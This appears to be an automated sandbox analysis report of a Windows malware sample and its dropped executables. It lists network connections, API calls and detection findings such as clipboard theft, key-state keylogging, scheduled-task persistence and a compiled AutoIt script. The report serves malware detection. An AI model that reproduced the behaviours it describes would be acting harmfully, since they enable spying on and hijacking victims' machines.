Source: unknown Network traffic detected: HTTP traffic on port 61150 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61138 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61064
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61067
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61189
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61081
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61082
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61084
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61085
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61075
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61076
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61079
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61095
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61088
Source: unknown Network traffic detected: HTTP traffic on port 61162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61139 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61097
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61099
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61150
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61030
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61151
Source: unknown Network traffic detected: HTTP traffic on port 61025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61028
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61149
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61141
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61021
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61142
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61143
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61144
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61146
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61026
Source: unknown Network traffic detected: HTTP traffic on port 61128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61147
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61027
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61148
Source: unknown Network traffic detected: HTTP traffic on port 61080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61160
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61040
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61041
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61162
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61039
Source: unknown Network traffic detected: HTTP traffic on port 61151 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61152
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61153
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61155
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61156
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61157
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61037
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61158
Source: unknown Network traffic detected: HTTP traffic on port 61014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61159
Source: unknown Network traffic detected: HTTP traffic on port 61081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61170
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61050
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61051
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61173
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61043
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61048
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61169
Source: unknown Network traffic detected: HTTP traffic on port 61013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61049
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61062
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61063
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61174
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61176
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61059
Source: unknown Network traffic detected: HTTP traffic on port 61129 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61153 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61101 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61112 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:61026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:61043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:61176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:61189 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:61190 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B9EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 6_2_00B9EAFF
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B9ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_00B9ED6A
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B9EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 6_2_00B9EAFF
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B8AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 6_2_00B8AA57
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00BB9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 6_2_00BB9576

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 84d280a9e8.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 84d280a9e8.exe, 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_1b54855c-2
Source: 84d280a9e8.exe, 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_ab99bae5-9
Source: 84d280a9e8.exe, 00000019.00000002.2952681186.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_40b8bba8-2
Source: 84d280a9e8.exe, 00000019.00000002.2952681186.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_318f3c19-f
Source: 84d280a9e8.exe, 0000004E.00000002.2952378189.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_386f8b28-7
Source: 84d280a9e8.exe, 0000004E.00000002.2952378189.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4116132c-1
Source: 84d280a9e8.exe.5.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_a51a73cd-8
Source: 84d280a9e8.exe.5.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_77806d17-b
Source: random[1].exe.5.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2199ef9a-4
Source: random[1].exe.5.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_cb341c9f-1
PE file contains section with special chars
Source: 8ObkdHP9Hq.exe Static PE information: section name:
Source: 8ObkdHP9Hq.exe Static PE information: section name: .idata
Source: 8ObkdHP9Hq.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: 9d7da53f74.exe.5.dr Static PE information: section name:
Source: 9d7da53f74.exe.5.dr Static PE information: section name: .rsrc
Source: 9d7da53f74.exe.5.dr Static PE information: section name: .idata
Source: 9d7da53f74.exe.5.dr Static PE information: section name:
PE file has a writeable .text section
Source: num[1].exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B8D5EB: CreateFileW,DeviceIoControl,CloseHandle, 6_2_00B8D5EB
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 6_2_00B81201
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B8E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 6_2_00B8E8F6
Creates files inside the system directory
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DAE530 5_2_00DAE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DE78BB 5_2_00DE78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DE7049 5_2_00DE7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DE8860 5_2_00DE8860
